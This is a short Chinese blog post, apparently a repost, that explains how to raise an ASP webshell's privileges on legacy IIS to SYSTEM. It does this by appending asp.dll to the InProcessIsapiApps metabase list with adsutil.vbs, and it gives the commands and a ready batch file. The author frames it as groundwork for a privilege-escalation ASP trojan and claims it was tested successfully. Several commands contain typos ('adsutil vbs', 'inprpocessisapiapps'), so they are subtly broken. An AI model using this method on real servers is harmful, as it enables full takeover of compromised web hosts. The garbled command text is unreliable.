现在的位置: 首页 > 综合 > 正文

将asp权限提到最高

2013年10月08日 ⁄ 综合 ⁄ 共 1509字 ⁄ 字号 评论关闭
by: cnqing from:http://friend.91eb.com
本来是要写个提权asp木马的,可惜时间不是太多功底也不是太深。先把原理方法告诉大家好了。简单说说,说的太麻烦没有必要。懂了就行。
原理:
asp文件的教本解释是由asp.dll运行的。由dllhost.exe启动的。身分是IWAN_NAME。若是把asp.dll放到inprocesslsapiapps中那它就是由inetifo.exe直接启动。身份是system
方法:
第一步。
得到inprocesslsapiapps内容,用命令"cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps"。将得到的一组dll复制下来。
第二步
写一个bat内容为"cscript C:/Inetpub/AdminScripts/adsutil vbs set w3svc/inprpocessisapiapps "C:/Inetpub/AdminScripts/asp.dll" ·····
省略号为复制下的内容。中间用空格分开不要带回车符
最后运行这个bat就行了。
例如:
我用"cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps"得到
"c:/winnt/system32/inetsrv/httpext.dll"
"c:/winnt/system32/inetsrv/httpodbc.dll"
"C:/WINNT/system32/inetsrv/ssinc.dll"
"C:/WINNT/System32/msw3prt.dll"
"C:/Program Files/Common Files/Microsoft Shared/Web Server Extensions/isapi/_vti_aut/author.dll"
"C:/Program Files/Common Files/Microsoft Shared/Web Server Extensions/isapi/_vti_adm/admin.dll"
"C:/Program Files/Common Files/Microsoft Shared/Web Server Extensions/isapi/shtml.dll"

那么你的bat就应该是:

cscript C:/Inetpub/AdminScripts/adsutil vbs set w3svc/inprpocessisapiapps "C:/Inetpub/AdminScripts/asp.dll" "c:/winnt/system32/inetsrv/httpext.dll" "c:/winnt/system32/inetsrv/httpodbc.dll" "C:/WINNT/system32/inetsrv/ssinc.dll" "C:/WINNT/System32/msw3prt.dll" "C:/Program Files/Common Files/Microsoft Shared/Web Server Extensions/isapi/_vti_aut/author.dll" "C:/Program Files/Common Files/Microsoft Shared/Web Server Extensions/isapi/_vti_adm/admin.dll" "C:/Program Files/Common Files/Microsoft Shared/Web Server Extensions/isapi/shtml.dll"

已测试成功!!

抱歉!评论已关闭.